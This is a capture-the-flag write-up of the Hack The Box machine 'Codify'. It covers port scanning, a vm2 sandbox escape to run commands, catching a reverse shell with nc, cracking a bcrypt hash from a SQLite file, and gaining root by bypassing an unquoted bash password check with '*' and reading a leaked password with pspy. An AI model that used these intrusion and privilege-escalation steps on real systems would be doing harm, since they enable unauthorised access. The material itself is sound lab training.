Codify - wook413

#hackthebox #linux #easy #tjnull ![[Pasted image 20250803004900.png]] # Information Gathering As always, started off with nmap TCP scan against all ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:40 UTC Nmap scan report for 10.10.11.239 Host is up (0.081s latency). Not shown: 65389 closed tcp ports (reset), 143 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds ``` Then another TCP scan against the three open ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80,3000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:41 UTC Nmap scan report for 10.10.11.239 Host is up (0.047s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA) |_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: Did not follow redirect to http://codify.htb/ |_http-server-header: Apache/2.4.52 (Ubuntu) 3000/tcp open http Node.js Express framework |_http-title: Codify Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.87 seconds ``` Finally, a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:42 UTC Nmap scan report for 10.10.11.239 Host is up (0.049s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds ``` # Enumeration ##### HTTP - TCP 80 Before opening up my browser and navigating to the webpage, I mapped the IP address and the domain in `/etc/hosts` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "10.10.11.239 codify.htb" | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.11.239 codify.htb ``` Landing page of `codify.htb` looks like below. ![[Pasted image 20250802214540.png]] As they introduce, when you click on `Try it now`, there's a space where you can run your code snippets. ![[Pasted image 20250802221304.png]] I verified `node.js` code is running properly. ![[Pasted image 20250802214958.png]] The website also guides us about the limitations of the platform. ![[Pasted image 20250802215643.png]] The `About Us` page tells us that they are using `vm2` library. Let's search for any known vulnerabilities to the library. ![[Pasted image 20250802221101.png]] It appears there's a known vulnerability to vm2. ![[Pasted image 20250802221218.png]] Remember, we are forced not to use `child_process` but that doesn't mean we can't use it in real `node_js` runtime. It appears to be escaping the `vm2` environment and use `child_process`. ![[Pasted image 20250802221448.png]] successfully ran `cat /etc/passwd` command. ![[Pasted image 20250802222025.png]] # Initial Access - Shell as `svc` I check `nc` is installed in the server with `which nc`. However, `nc -e sh <IP>` command failed to trigger a reverse shell. Therefore, I used the following as an alternative payload. ![[Pasted image 20250802223623.png]] Connected to the reverse shell as `svc` user ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.11.239] 60324 sh: 0: can't access tty; job control turned off $ whoami svc ``` ```bash svc@codify:/home$ ls ls joshua svc svc@codify:/home$ cd joshua cd joshua bash: cd: joshua: Permission denied ``` # Lateral Movement - shell as `joshua` ```bash svc@codify:/var/www/contact$ ls index.js package.json package-lock.json templates tickets.db ``` ```bash svc@codify:/var/www/contact$ file tickets.db tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17 ``` ![[Pasted image 20250802230304.png]] ![[Pasted image 20250802230415.png]] Even though the hash type matched `bcryptsha512`, it took forever to crack. So I tried regular bcrypt mode 3200 and it cracked the hash and returned the password in plaintext. ![[Pasted image 20250802232219.png]] ```bash svc@codify:/var/www/contact$ su joshua Password: joshua@codify:/var/www/contact$ whoami joshua ``` Found `user.txt` ```bash joshua@codify:~$ ls user.txt joshua@codify:~$ cat user.txt d78... ``` # Privilege Escalation - shell as `root` `sudo -l` command reveals that `joshua` can run `/opt/scripts/mysq-backup.sh` command as `root` with `sudo`. ```bash joshua@codify:~$ sudo -l [sudo] password for joshua: Matching Defaults entries for joshua on codify: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh ``` The following is the content of `mysql-backup.sh`. It contains 2 main vulnerabilities. 1. `[[ $DB_PASS == $USER_PASS ]]` The variables inside the condition should be wrapped in double quotes. Without them, word splitting or globbing can occur. When prompted for a password, a user could enter `*` to match any string of `$DB_PASS` value and bypass the check. 2. `/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"` The `$DB_PASS` variable is passed directly as a command line argument. If we monitor running processes while this command is executed, we will be able to see the password in plaintext. ```bash joshua@codify:~$ cat /opt/scripts/mysql-backup.sh #!/bin/bash DB_USER="root" DB_PASS=$(/usr/bin/cat /root/.creds) BACKUP_DIR="/var/backups/mysql" read -s -p "Enter MySQL password for $DB_USER: " USER_PASS /usr/bin/echo if [[ $DB_PASS == $USER_PASS ]]; then /usr/bin/echo "Password confirmed!" else /usr/bin/echo "Password confirmation failed!" exit 1 fi /usr/bin/mkdir -p "$BACKUP_DIR" databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)") for db in $databases; do /usr/bin/echo "Backing up database: $db" /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz" done /usr/bin/echo "All databases backed up successfully!" /usr/bin/echo "Changing the permissions" /usr/bin/chown root:sys-adm "$BACKUP_DIR" /usr/bin/chmod 774 -R "$BACKUP_DIR" /usr/bin/echo 'Done!' ``` I entered `*` as password. ```bash joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh Enter MySQL password for root: Password confirmed! mysql: [Warning] Using a password on the command line interface can be insecure. Backing up database: mysql mysqldump: [Warning] Using a password on the command line interface can be insecure. -- Warning: column statistics not supported by the server. mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES Backing up database: sys mysqldump: [Warning] Using a password on the command line interface can be insecure. -- Warning: column statistics not supported by the server. All databases backed up successfully! Changing the permissions Done! ``` I transferred `pspy` from my kali to the remote host. ![[Pasted image 20250803001417.png]] I opened another pane, logged in as `joshua`, and executed `sudo /opt/scripts/mysql-backup.sh`. A second later, `pspy` displayed the password in plaintext. - Why the password inside the following command is not visible in `pspy`? `databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")` - Because ![[Pasted image 20250803001156.png]] ```bash joshua@codify:~$ su root Password: root@codify:/home/joshua# whoami root ``` Found `root.txt` ```bash root@codify:/home/joshua# cat /root/root.txt b15... ```